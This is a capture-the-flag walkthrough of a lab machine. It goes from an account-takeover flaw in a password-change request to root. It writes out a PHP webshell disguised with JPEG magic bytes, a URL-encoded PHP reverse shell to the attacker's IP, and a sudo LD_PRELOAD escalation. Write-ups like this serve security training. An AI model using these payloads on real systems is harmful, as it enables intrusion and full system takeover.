Target IP: 10.10.148.116
Challenge Description: As usual, obtain the user and root flag.
There are two TCP ports open on the target machine: SSH and HTTP, as shown above.
Aggressive port scan against the open TCP ports returns the result above. The HTTP application on port 80 looks interesting.
Port 80: HTTP
The webpage above is displayed for this web application.
I performed source-code scanning, and found an the login page at http://10.10.148.116/v2/admin/login.html as shown above.
And browsing to http://10.10.148.116/v2/admin/login.html displays the login webpage above. I sprayed different default credentials, such as admin:admin and root:root, but I had no luck. However, I notice it is possible to register an account on this web application.
I tried to create an account using the details above. After pressing the Register button, I got a successful confirmation!
I logged into the web application using the credentials I registered with. The webpage above is shown after logging in.
After some enumeration, I found the interesting information above. I tried to change the profile picture of the new user to see if I can upload a webshell, but I had no luck; however, the admin user has access to this feature! I even obtained the email of the admin user which is admin@sky.thm, as shown above.
Why does this web-application allow users to change their password directly? Maybe I can change the password of the user admin as I have their email address?
Using Burpsuite, I intercepted the POST request to change the password of the new user I created. And then I changed the email field to admin@sky.thm as shown above.
After forwarding this request, I got the message above. It looks like the password of user admin@sky.thm has been changed to test.
And bingo! I successfully logged in as the user admin as shown above. I should be able to change the profile picture now.
I created a simple PHP webshell called php.jpg.phtml. This contains the code aaaa<?php echo system($_GET['cmd']);?>. There are four a at the beginning because I will be using hexeditor to input the magicbytes of JPG header. And I added the FFD8FFE0 bytes in the beginning using hexeditor.
After doing this, running file against the PHP webshell shows it is JPEG image data. This is done to bypass any filtering that is in place on the target system. And then I successfully uploaded this PHP webshell via the change profile picture feature. But where has my webshell been uploaded to?
As shown above, apparently the profile picture images are uploaded to /v2/profileimages/. I found this when viewing the source-code of the profile.php PHP file.
And bingo! Browsing to http://10.10.148.116/v2/profileimages/ states Directory listing is diabled.. But inputting the full file name and location provides me access to my webshell, as shown above. I can use the webshell to perform RCE. Time to upgrade this to a reverse shell connection.
Now I have a foothold on the target machine with the session as www-data. I started a listener on my machine at port 8443. Since the target machine is already using PHP, I deployed the URL-encoded PHP reverse shell script php%20-r%20%27%24sock%3Dfsockopen%28%2210.14.55.153%22%2C8443%29%3Bexec%28%22bash%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27 via the webshell as shown above.
I noticed the credentials root:ThisIsSecurePassword! is hard-coded in some PHP files. Maybe I can access the MySQL application?
Using the credentials root:ThisIsSecurePassword!, I logged in to the MySQL application as the user root as shown above. There is an interesting database called SKY. However, I did not find anything useful here. I tried to spray this password against the user webdeveloper, but I had no luck.
Running the command ps -auxw shows the mongodb entry above. There is mongo database running on the target machine.
Using the command mongo, I started the mongo database application. I ran the command show databases and it showed me four different databases. After enumerating for some time, I found backup to be the most interesting. This database contains a table called user. And this table contains the password BahamasChapp123!@# of the user webdeveloper, who is also a user on this sytem.
And bingo! I successfully evelated my privileges to the user webdeveloper from www-data using the password BahamasChapp123!@# now.
Running the command sudo -l shows the information above. The important part is the env_keep+=LD_PRELOAD. This means I can load my own malicious library.
Over at /tmp, I created the malicious C library file with the name shell.c as shown above.
I compiled the code using the command gcc -fPIC -shared -o shell.so shell.c -nostartfiles, as shown above. And then using the command sudo LD_PRELOAD=/tmp/shell.so sky_backup_utility, I obtained a root shell. GG.
The user.txt flag is shown above.
The root.txt flag is shown above.